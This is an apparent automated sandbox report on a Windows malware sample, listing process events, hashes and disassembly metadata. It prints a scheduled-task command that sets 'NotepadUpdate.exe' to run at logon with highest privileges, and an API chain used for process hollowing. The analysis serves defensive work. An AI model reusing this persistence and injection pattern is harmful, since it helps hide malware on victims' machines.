                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:35
                                Start time:09:29:13
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD9E2.tmp.bat""
                                Imagebase:0x410000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:36
                                Start time:09:29:13
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:37
                                Start time:09:29:13
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"'
                                Imagebase:0x970000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:38
                                Start time:09:29:13
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\timeout.exe
                                Wow64 process (32bit):true
                                Commandline:timeout 3
                                Imagebase:0xac0000
                                File size:25'088 bytes
                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:39
                                Start time:09:29:16
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\NotepadUpdate.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\NotepadUpdate.exe
                                Imagebase:0xea0000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 26%, ReversingLabs
                                Has exited:true

                                General

                                Target ID:40
                                Start time:09:29:16
                                Start date:10/12/2024
                                Path:C:\Users\user\AppData\Roaming\NotepadUpdate.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"
                                Imagebase:0xdb0000
                                File size:670'216 bytes
                                MD5 hash:AE806B6F5E02484C2BE2B49DA35B3D26
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:41
                                Start time:09:29:17
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit
                                Imagebase:0x410000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:42
                                Start time:09:29:17
                                Start date:10/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:43
                                Start time:09:29:17
                                Start date:10/12/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"'
                                Imagebase:0x970000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:11.8%
                                  Dynamic/Decrypted Code Coverage:98.9%
                                  Signature Coverage:1.8%
                                  Total number of Nodes:284
                                  Total number of Limit Nodes:16
                                  execution_graph 54201 a1d580 54202 a1d5c6 GetCurrentProcess 54201->54202 54204 a1d611 54202->54204 54205 a1d618 GetCurrentThread 54202->54205 54204->54205 54206 a1d655 GetCurrentProcess 54205->54206 54207 a1d64e 54205->54207 54208 a1d68b 54206->54208 54207->54206 54209 a1d6b3 GetCurrentThreadId 54208->54209 54210 a1d6e4 54209->54210 54194 7229b20 54195 7229cab 54194->54195 54196 7229b46 54194->54196 54196->54195 54198 72226fc 54196->54198 54199 7229da0 PostMessageW 54198->54199 54200 7229e0c 54199->54200 54200->54196 54267 722a290 54268 722a2aa 54267->54268 54272 722a710 54268->54272 54276 722a685 54268->54276 54269 722a306 54273 722a748 54272->54273 54274 722a95b 54272->54274 54273->54274 54281 7222798 54273->54281 54274->54269 54277 722a67c 54276->54277 54278 722a68b 54276->54278 54279 722a95b 54278->54279 54280 7222798 PostMessageW 54278->54280 54279->54269 54280->54279 54284 72227a3 54281->54284 54282 722a277 54282->54274 54283 72226fc PostMessageW 54283->54282 54284->54282 54284->54283 54532 722a0d0 54533 7222798 PostMessageW 54532->54533 54534 722a0e9 54533->54534 54535 5851df0 54536 5851e58 CreateWindowExW 54535->54536 54538 5851f14 54536->54538 54538->54538 54539 72261d5 54540 72261c5 54539->54540 54541 7226104 54539->54541 54541->54540 54542 7228a00 12 API calls 54541->54542 54543 72289c0 12 API calls 54541->54543 54544 72289d0 12 API calls 54541->54544 54545 7228a04 12 API calls 54541->54545 54542->54540 54543->54540 54544->54540 54545->54540 54211 9cd1b4 54212 9cd1cc 54211->54212 54213 9cd226 54212->54213 54218 5850bac 54212->54218 54227 5851fa8 54212->54227 54231 5851f98 54212->54231 54235 5852cf8 54212->54235 54219 5850bb7 54218->54219 54220 5852d69 54219->54220 54222 5852d59 54219->54222 54257 5850cd4 54220->54257 54244 5852e81 54222->54244 54248 5852e90 54222->54248 54252 5852f5c 54222->54252 54223 5852d67 54223->54223 54228 5851fce 54227->54228 54229 5850bac CallWindowProcW 54228->54229 54230 5851fef 54229->54230 54230->54213 54232 5851f9c 54231->54232 54233 5850bac CallWindowProcW 54232->54233 54234 5851fef 54233->54234 54234->54213 54238 5852cfc 54235->54238 54236 5852d69 54237 5850cd4 CallWindowProcW 54236->54237 54240 5852d67 54237->54240 54238->54236 54239 5852d59 54238->54239 54241 5852e81 CallWindowProcW 54239->54241 54242 5852e90 CallWindowProcW 54239->54242 54243 5852f5c CallWindowProcW 54239->54243 54240->54240 54241->54240 54242->54240 54243->54240 54246 5852e84 54244->54246 54245 5852f30 54245->54223 54261 5852f48 54246->54261 54249 5852ea4 54248->54249 54251 5852f48 CallWindowProcW 54249->54251 54250 5852f30 54250->54223 54251->54250 54253 5852f1a 54252->54253 54254 5852f6a 54252->54254 54256 5852f48 CallWindowProcW 54253->54256 54255 5852f30 54255->54223 54256->54255 54258 5850cdf 54257->54258 54259 58543f9 54258->54259 54260 585444a CallWindowProcW 54258->54260 54259->54223 54260->54259 54263 5852f59 54261->54263 54264 5854395 54261->54264 54263->54245 54265 5850cd4 CallWindowProcW 54264->54265 54266 585439a 54265->54266 54266->54263 54285 a1b218 54288 a1b313 54285->54288 54286 a1b227 54289 a1b344 54288->54289 54290 a1b321 54288->54290 54289->54286 54290->54289 54291 a1b548 GetModuleHandleW 54290->54291 54292 a1b575 54291->54292 54292->54286 54293 a14668 54294 a1467a 54293->54294 54298 a146b8 54294->54298 54303 a14778 54294->54303 54295 a14686 54299 a146bc 54298->54299 54308 a14888 54299->54308 54312 a14878 54299->54312 54304 a1477c 54303->54304 54306 a14888 CreateActCtxA 54304->54306 54307 a14878 CreateActCtxA 54304->54307 54305 a147a7 54305->54295 54306->54305 54307->54305 54310 a148af 54308->54310 54309 a1498c 54309->54309 54310->54309 54316 a144b4 54310->54316 54314 a14880 54312->54314 54313 a1498c 54313->54313 54314->54313 54315 a144b4 CreateActCtxA 54314->54315 54315->54313 54317 a15918 CreateActCtxA 54316->54317 54319 a159db 54317->54319 54319->54319 54530 a1d7c8 DuplicateHandle 54531 a1d85e 54530->54531 54320 72260ff 54321 722608b 54320->54321 54322 7226102 54320->54322 54323 72261c5 54322->54323 54328 7228a00 54322->54328 54347 7228a04 54322->54347 54366 72289d0 54322->54366 54385 72289c0 54322->54385 54329 7228a1a 54328->54329 54404 7229367 54329->54404 54409 7229306 54329->54409 54414 7228f81 54329->54414 54418 7228e61 54329->54418 54423 7229283 54329->54423 54427 7229022 54329->54427 54432 7228ffd 54329->54432 54437 7228df9 54329->54437 54442 7229057 54329->54442 54447 7229597 54329->54447 54452 7229476 54329->54452 54458 7228f4d 54329->54458 54463 72290ec 54329->54463 54468 722930c 54329->54468 54472 722944f 54329->54472 54477 7228e2f 54329->54477 54330 7228a22 54330->54323 54348 7228a1a 54347->54348 54350 7229022 2 API calls 54348->54350 54351 7229283 2 API calls 54348->54351 54352 7228e61 2 API calls 54348->54352 54353 7228f81 2 API calls 54348->54353 54354 7229306 2 API calls 54348->54354 54355 7229367 2 API calls 54348->54355 54356 7228e2f 2 API calls 54348->54356 54357 722944f 2 API calls 54348->54357 54358 722930c 2 API calls 54348->54358 54359 72290ec 2 API calls 54348->54359 54360 7228f4d 2 API calls 54348->54360 54361 7229476 2 API calls 54348->54361 54362 7229597 2 API calls 54348->54362 54363 7229057 2 API calls 54348->54363 54364 7228df9 2 API calls 54348->54364 54365 7228ffd 2 API calls 54348->54365 54349 7228a22 54349->54323 54350->54349 54351->54349 54352->54349 54353->54349 54354->54349 54355->54349 54356->54349 54357->54349 54358->54349 54359->54349 54360->54349 54361->54349 54362->54349 54363->54349 54364->54349 54365->54349 54367 72289dc 54366->54367 54367->54323 54369 7229022 2 API calls 54367->54369 54370 7229283 2 API calls 54367->54370 54371 7228e61 2 API calls 54367->54371 54372 7228f81 2 API calls 54367->54372 54373 7229306 2 API calls 54367->54373 54374 7229367 2 API calls 54367->54374 54375 7228e2f 2 API calls 54367->54375 54376 722944f 2 API calls 54367->54376 54377 722930c 2 API calls 54367->54377 54378 72290ec 2 API calls 54367->54378 54379 7228f4d 2 API calls 54367->54379 54380 7229476 2 API calls 54367->54380 54381 7229597 2 API calls 54367->54381 54382 7229057 2 API calls 54367->54382 54383 7228df9 2 API calls 54367->54383 54384 7228ffd 2 API calls 54367->54384 54368 7228a22 54368->54323 54369->54368 54370->54368 54371->54368 54372->54368 54373->54368 54374->54368 54375->54368 54376->54368 54377->54368 54378->54368 54379->54368 54380->54368 54381->54368 54382->54368 54383->54368 54384->54368 54386 72289c3 54385->54386 54386->54323 54388 7229022 2 API calls 54386->54388 54389 7229283 2 API calls 54386->54389 54390 7228e61 2 API calls 54386->54390 54391 7228f81 2 API calls 54386->54391 54392 7229306 2 API calls 54386->54392 54393 7229367 2 API calls 54386->54393 54394 7228e2f 2 API calls 54386->54394 54395 722944f 2 API calls 54386->54395 54396 722930c 2 API calls 54386->54396 54397 72290ec 2 API calls 54386->54397 54398 7228f4d 2 API calls 54386->54398 54399 7229476 2 API calls 54386->54399 54400 7229597 2 API calls 54386->54400 54401 7229057 2 API calls 54386->54401 54402 7228df9 2 API calls 54386->54402 54403 7228ffd 2 API calls 54386->54403 54387 7228a22 54387->54323 54388->54387 54389->54387 54390->54387 54391->54387 54392->54387 54393->54387 54394->54387 54395->54387 54396->54387 54397->54387 54398->54387 54399->54387 54400->54387 54401->54387 54402->54387 54403->54387 54406 7228feb 54404->54406 54405 7229819 54406->54405 54482 7225811 54406->54482 54486 7225818 54406->54486 54410 72294bf 54409->54410 54490 72258c0 54410->54490 54494 72258c8 54410->54494 54411 72294da 54498 7225a60 54414->54498 54502 7225a59 54414->54502 54415 7228f38 54419 7228e29 54418->54419 54420 7228e0d 54418->54420 54419->54330 54420->54419 54506 7225ce8 54420->54506 54510 7225cdc 54420->54510 54425 7225a60 WriteProcessMemory 54423->54425 54426 7225a59 WriteProcessMemory 54423->54426 54424 72292b1 54424->54330 54425->54424 54426->54424 54428 7229028 54427->54428 54514 7225b50 54428->54514 54518 7225b48 54428->54518 54429 722905f 54429->54330 54433 7228feb 54432->54433 54433->54432 54434 7229819 54433->54434 54435 7225811 ResumeThread 54433->54435 54436 7225818 ResumeThread 54433->54436 54435->54433 54436->54433 54439 7228e0c 54437->54439 54438 7228e29 54438->54330 54439->54438 54440 7225ce8 CreateProcessA 54439->54440 54441 7225cdc CreateProcessA 54439->54441 54440->54438 54441->54438 54443 7229072 54442->54443 54522 72259a0 54443->54522 54526 7225998 54443->54526 54444 7229090 54448 722959b 54447->54448 54450 7225a60 WriteProcessMemory 54448->54450 54451 7225a59 WriteProcessMemory 54448->54451 54449 72295d3 54450->54449 54451->54449 54454 7229039 54452->54454 54453 72294b9 54453->54330 54454->54453 54456 7225b50 ReadProcessMemory 54454->54456 54457 7225b48 ReadProcessMemory 54454->54457 54455 722905f 54455->54330 54456->54455 54457->54455 54460 7228f5d 54458->54460 54459 72295d3 54461 7225a60 WriteProcessMemory 54460->54461 54462 7225a59 WriteProcessMemory 54460->54462 54461->54459 54462->54459 54464 72290ab 54463->54464 54465 722905f 54463->54465 54466 7225b50 ReadProcessMemory 54464->54466 54467 7225b48 ReadProcessMemory 54464->54467 54465->54330 54466->54465 54467->54465 54470 72258c0 Wow64SetThreadContext 54468->54470 54471 72258c8 Wow64SetThreadContext 54468->54471 54469 7229326 54469->54330 54470->54469 54471->54469 54474 7228feb 54472->54474 54473 7229819 54474->54473 54475 7225811 ResumeThread 54474->54475 54476 7225818 ResumeThread 54474->54476 54475->54474 54476->54474 54479 7228e0d 54477->54479 54478 7228e29 54478->54330 54479->54478 54480 7225ce8 CreateProcessA 54479->54480 54481 7225cdc CreateProcessA 54479->54481 54480->54478 54481->54478 54483 7225818 ResumeThread 54482->54483 54485 7225889 54483->54485 54485->54406 54487 7225858 ResumeThread 54486->54487 54489 7225889 54487->54489 54489->54406 54491 72258c5 Wow64SetThreadContext 54490->54491 54493 7225955 54491->54493 54493->54411 54495 722590d Wow64SetThreadContext 54494->54495 54497 7225955 54495->54497 54497->54411 54499 7225aa8 WriteProcessMemory 54498->54499 54501 7225aff 54499->54501 54501->54415 54503 7225a60 WriteProcessMemory 54502->54503 54505 7225aff 54503->54505 54505->54415 54507 7225d71 CreateProcessA 54506->54507 54509 7225f33 54507->54509 54509->54509 54511 7225ce8 CreateProcessA 54510->54511 54513 7225f33 54511->54513 54513->54513 54515 7225b9b ReadProcessMemory 54514->54515 54517 7225bdf 54515->54517 54517->54429 54519 7225b51 ReadProcessMemory 54518->54519 54521 7225bdf 54519->54521 54521->54429 54523 72259e0 VirtualAllocEx 54522->54523 54525 7225a1d 54523->54525 54525->54444 54527 72259a0 VirtualAllocEx 54526->54527 54529 7225a1d 54527->54529 54529->54444

                                  Executed Functions

                                  Function 08874117 Relevance: 8.9, Strings: 5, Instructions: 2604COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1437095337.0000000008870000.00000040.00000800.00020000.00000000.sdmp, Offset: 08870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_8870000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (oq$4'q$4'q$4'q$4'q
                                  • API String ID: 0-921078497
                                  • Opcode ID: 593e7375a5f26e76d35099c04dab7d096595efe260d7136e1b31c4d574618f2d
                                  • Instruction ID: 1c73e6c4a791843f3dbf8c04e0af03921c808e8f95b2a4308c45d705441bca28
                                  • Opcode Fuzzy Hash: 593e7375a5f26e76d35099c04dab7d096595efe260d7136e1b31c4d574618f2d
                                  • Instruction Fuzzy Hash: 03430774A00619CFDB24DF68C888A9DB7B2BF89311F158599E409EB361DB35ED82CF44
                                  Function 08873668 Relevance: 7.0, Strings: 5, Instructions: 720COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1437095337.0000000008870000.00000040.00000800.00020000.00000000.sdmp, Offset: 08870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_8870000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (oq$(oq$,q$,q$Hq
                                  • API String ID: 0-962059274
                                  • Opcode ID: 27dd888c965f2d3f93e5064d31ebb353b1eeac6f9ac081c87834844c7417b9af
                                  • Instruction ID: 83a298da89a920126756ae385249c16c3ce092b63f2b8f97c18d00d9a35f9612
                                  • Opcode Fuzzy Hash: 27dd888c965f2d3f93e5064d31ebb353b1eeac6f9ac081c87834844c7417b9af
                                  • Instruction Fuzzy Hash: CA52C335B00215DFDB14DF69D488AADBBB2FF88351B558069E806DB760CB31EC42DB91
                                  Function 058576A8 Relevance: 3.1, Strings: 1, Instructions: 1830COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1439 58576a8-58576d3 1440 58576d5 1439->1440 1441 58576da-5857c24 call 585735c call 585736c call 585737c call 585736c call 585737c call 585738c call 585737c call 585738c call 585739c call 585736c call 585737c call 58573ac call 585737c call 58573bc * 3 call 58573cc call 58573dc call 58573ec call 58573fc 1439->1441 1440->1441 1528 5857c26-5857c32 1441->1528 1529 5857c4e 1441->1529 1530 5857c34-5857c3a 1528->1530 1531 5857c3c-5857c42 1528->1531 1532 5857c54-5857ff8 call 585740c call 58573cc call 58573dc call 58573ec call 585741c call 585742c call 585743c call 585744c call 585745c call 58573cc call 58573dc call 58573ec call 58573fc 1529->1532 1533 5857c4c 1530->1533 1531->1533 1575 5858022 1532->1575 1576 5857ffa-5858006 1532->1576 1533->1532 1579 5858028-5858285 call 585740c call 58573cc call 58573dc call 58573ec call 585741c call 585742c call 585743c call 58573cc call 58573dc 1575->1579 1577 5858010-5858016 1576->1577 1578 5858008-585800e 1576->1578 1580 5858020 1577->1580 1578->1580 1848 5858288 call 8871230 1579->1848 1849 5858288 call 8871240 1579->1849 1580->1579 1608 585828e-5858334 1850 585833a call 88729b8 1608->1850 1851 585833a call 88729c8 1608->1851 1615 5858340-5858374 1618 5858376 1615->1618 1619 585837b-5858b17 call 58573ec call 58573fc call 585744c call 585746c call 58573cc call 58573dc call 58573ec call 58573fc call 585747c call 58573cc call 58573dc call 58573ec call 58573fc call 585746c call 58573cc call 58573dc call 58573ec call 58573fc call 585745c call 58573cc call 58573dc call 58573ec call 58573fc call 585748c call 585744c 1615->1619 1618->1619 1701 5858b41 1619->1701 1702 5858b19-5858b25 1619->1702 1705 5858b47-5859392 call 585740c call 58573cc call 58573dc call 58573ec call 585741c call 585742c call 585743c call 585745c call 58573cc call 58573dc call 58573ec call 58573fc call 58573cc call 58573dc call 58573ec call 58573fc call 585748c call 585749c call 585745c call 58573cc call 58573dc call 58573ec call 58573fc call 585744c call 58574ac call 58574bc call 58574cc call 58573bc * 6 1701->1705 1703 5858b27-5858b2d 1702->1703 1704 5858b2f-5858b35 1702->1704 1706 5858b3f 1703->1706 1704->1706 1852 5859395 call 887a338 1705->1852 1853 5859395 call 887a348 1705->1853 1706->1705 1808 5859398-58595da call 58573bc * 4 call 585745c call 58574dc call 58574ec call 58573dc call 58574fc call 585750c call 585751c * 2 1847 58595df-58595e7 1808->1847 1848->1608 1849->1608 1850->1615 1851->1615 1852->1808 1853->1808
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Gq
                                  • API String ID: 0-2351003426
                                  • Opcode ID: a0be3b788ffa80474397c7ac9022cc232f11c44b74ff2c27d0b8492c62d0b198
                                  • Instruction ID: aaa40a6a9b2fb8a2dc4f114da7e468eec7f13e4e47dd6139548df262369d4ea0
                                  • Opcode Fuzzy Hash: a0be3b788ffa80474397c7ac9022cc232f11c44b74ff2c27d0b8492c62d0b198
                                  • Instruction Fuzzy Hash: 7D13C734A11219CFCB15DF28C898AD9B7B1FF89310F5181E9E909AB361DB71AE85CF41
                                  Function 0585769A Relevance: 3.1, Strings: 1, Instructions: 1821COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1854 585769a-58576d3 1855 58576d5 1854->1855 1856 58576da-585778b call 585735c call 585736c 1854->1856 1855->1856 1869 5857795-58577a1 call 585737c 1856->1869 1871 58577a6-58578b7 call 585736c call 585737c call 585738c call 585737c call 585738c 1869->1871 1893 58578c1-58578cd call 585739c 1871->1893 1895 58578d2-5857a20 call 585736c call 585737c call 58573ac call 585737c 1893->1895 1918 5857a2b-5857a3e 1895->1918 1919 5857a44-5857a53 call 58573bc 1918->1919 1921 5857a58-5857a6c 1919->1921 1922 5857a72-5857a81 call 58573bc 1921->1922 1924 5857a86-5857a9a 1922->1924 1925 5857aa0-5857bba call 58573bc call 58573cc call 58573dc 1924->1925 1937 5857bc4-5857bd8 call 58573ec 1925->1937 1939 5857bdd-5857c24 call 58573fc 1937->1939 1943 5857c26-5857c32 1939->1943 1944 5857c4e 1939->1944 1945 5857c34-5857c3a 1943->1945 1946 5857c3c-5857c42 1943->1946 1947 5857c54-5857cf5 call 585740c call 58573cc call 58573dc 1944->1947 1948 5857c4c 1945->1948 1946->1948 1956 5857cff-5857d19 call 58573ec 1947->1956 1948->1947 1958 5857d1e-5857dae call 585741c call 585742c call 585743c call 585744c 1956->1958 1968 5857db3-5857dc7 1958->1968 1969 5857dcd-5857e0e call 585745c 1968->1969 1972 5857e13-5857e21 1969->1972 1973 5857e27-5857ff8 call 58573cc call 58573dc call 58573ec call 58573fc 1972->1973 1990 5858022 1973->1990 1991 5857ffa-5858006 1973->1991 1994 5858028-585818b call 585740c call 58573cc call 58573dc call 58573ec call 585741c call 585742c call 585743c 1990->1994 1992 5858010-5858016 1991->1992 1993 5858008-585800e 1991->1993 1995 5858020 1992->1995 1993->1995 2013 5858196-58581b0 call 58573cc 1994->2013 1995->1994 2015 58581b5-5858239 call 58573dc 2013->2015 2019 585823e 2015->2019 2020 5858245-5858264 2019->2020 2022 585826f-5858285 2020->2022 2265 5858288 call 8871230 2022->2265 2266 5858288 call 8871240 2022->2266 2023 585828e-58582e3 2027 58582ed-58582fe 2023->2027 2028 5858305-5858317 2027->2028 2029 5858322-5858334 2028->2029 2267 585833a call 88729b8 2029->2267 2268 585833a call 88729c8 2029->2268 2030 5858340-585834c 2031 5858356-585835e 2030->2031 2032 5858364-5858374 2031->2032 2033 5858376 2032->2033 2034 585837b-5858460 call 58573ec call 58573fc call 585744c 2032->2034 2033->2034 2045 5858465-5858479 call 585746c 2034->2045 2047 585847e-5858b17 call 58573cc call 58573dc call 58573ec call 58573fc call 585747c call 58573cc call 58573dc call 58573ec call 58573fc call 585746c call 58573cc call 58573dc call 58573ec call 58573fc call 585745c call 58573cc call 58573dc call 58573ec call 58573fc call 585748c call 585744c 2045->2047 2116 5858b41 2047->2116 2117 5858b19-5858b25 2047->2117 2120 5858b47-585923a call 585740c call 58573cc call 58573dc call 58573ec call 585741c call 585742c call 585743c call 585745c call 58573cc call 58573dc call 58573ec call 58573fc call 58573cc call 58573dc call 58573ec call 58573fc call 585748c call 585749c call 585745c call 58573cc call 58573dc call 58573ec call 58573fc call 585744c call 58574ac 2116->2120 2118 5858b27-5858b2d 2117->2118 2119 5858b2f-5858b35 2117->2119 2121 5858b3f 2118->2121 2119->2121 2200 585923f-585924b call 58574bc 2120->2200 2121->2120 2202 5859250-5859373 call 58574cc call 58573bc * 6 2200->2202 2222 5859378-5859392 2202->2222 2263 5859395 call 887a338 2222->2263 2264 5859395 call 887a348 2222->2264 2223 5859398-5859477 call 58573bc * 4 call 585745c 2238 585947c-585948a 2223->2238 2239 5859490-58594ff call 58574dc call 58574ec call 58573dc 2238->2239 2246 5859504-5859510 call 58574fc 2239->2246 2248 5859515-585955d call 585750c 2246->2248 2253 5859562-5859587 call 585751c 2248->2253 2256 585958c-58595b9 2253->2256 2259 58595c5-58595da call 585751c 2256->2259 2262 58595df-58595e7 2259->2262 2263->2223 2264->2223 2265->2023 2266->2023 2267->2030 2268->2030
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Gq
                                  • API String ID: 0-2351003426
                                  • Opcode ID: 1d652efed4e3b0376f3bd21041e4b0c22b3be0d0313067bc3f41a4620ad8c648
                                  • Instruction ID: 3295fd3d61da94c74239c1e23bb2109dc6ae1cf94b6c66eb30be5632b6bc33e4
                                  • Opcode Fuzzy Hash: 1d652efed4e3b0376f3bd21041e4b0c22b3be0d0313067bc3f41a4620ad8c648
                                  • Instruction Fuzzy Hash: 0013C734A11219CFCB15DF28C898AD9B7B1FF89310F5181E9E909AB361DB71AE85CF41
                                  Function 08871240 Relevance: 1.9, Strings: 1, Instructions: 649COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1437095337.0000000008870000.00000040.00000800.00020000.00000000.sdmp, Offset: 08870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_8870000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: d
                                  • API String ID: 0-2564639436
                                  • Opcode ID: 6051adcfdd5470d165ad761cd217b4a3bce75807ce76d51e308eeea421018c97
                                  • Instruction ID: 68cf6a11e346cb96b1605b1b4fc6c90ca97c3ce58efd932048e94b0bc5723b6f
                                  • Opcode Fuzzy Hash: 6051adcfdd5470d165ad761cd217b4a3bce75807ce76d51e308eeea421018c97
                                  • Instruction Fuzzy Hash: A162CE74E01228CFDB24DF69C988BDDBBB2BB89301F5081E9D449A7255DB34AE85CF50
                                  Function 08871230 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1437095337.0000000008870000.00000040.00000800.00020000.00000000.sdmp, Offset: 08870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_8870000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: d
                                  • API String ID: 0-2564639436
                                  • Opcode ID: e03f44256dcd9b380617c2dfb1cc002cece0fe39126c4bfc3c7c3a6c1ef604d1
                                  • Instruction ID: ae3f25b03278bfcb96eef9b286571f322998ca111963f604edec70e9e34fe287
                                  • Opcode Fuzzy Hash: e03f44256dcd9b380617c2dfb1cc002cece0fe39126c4bfc3c7c3a6c1ef604d1
                                  • Instruction Fuzzy Hash: 1B510675E04228CFDB24DF66C8447EEBBB2AB89301F40C1AAD419A7654DB345A86CF40
                                  Function 0722A685 Relevance: .6, Instructions: 607COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ddf00fb8df03399f9edf9b1482e8e20d39247360ff265345a815c1b2debdeb1
                                  • Instruction ID: fa54d49d78da2b33be2f764f06434aac9ad258dd668f5b09e7fce407e68327a4
                                  • Opcode Fuzzy Hash: 5ddf00fb8df03399f9edf9b1482e8e20d39247360ff265345a815c1b2debdeb1
                                  • Instruction Fuzzy Hash: CA22DDB0B11215AFDB15DB69C550BAEB7F7AF88300F108469E906DB7A1CB30ED42CB51
                                  Function 05850BD4 Relevance: .3, Instructions: 253COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7228f369f640bf5437b1ba02c591beb3b5ddd4c87f39560fa37a3778a22d0016
                                  • Instruction ID: 26a88e5417fa1aafc0c65738a357a15a1c2a112230ceb7b47d2b8264cd9d49c4
                                  • Opcode Fuzzy Hash: 7228f369f640bf5437b1ba02c591beb3b5ddd4c87f39560fa37a3778a22d0016
                                  • Instruction Fuzzy Hash: 87A1A135E003199FCB05DFA4D894ADDBBB6FF89310F548215E916AB2A4DF30AD45CB90
                                  Function 058520F0 Relevance: .2, Instructions: 221COMMON
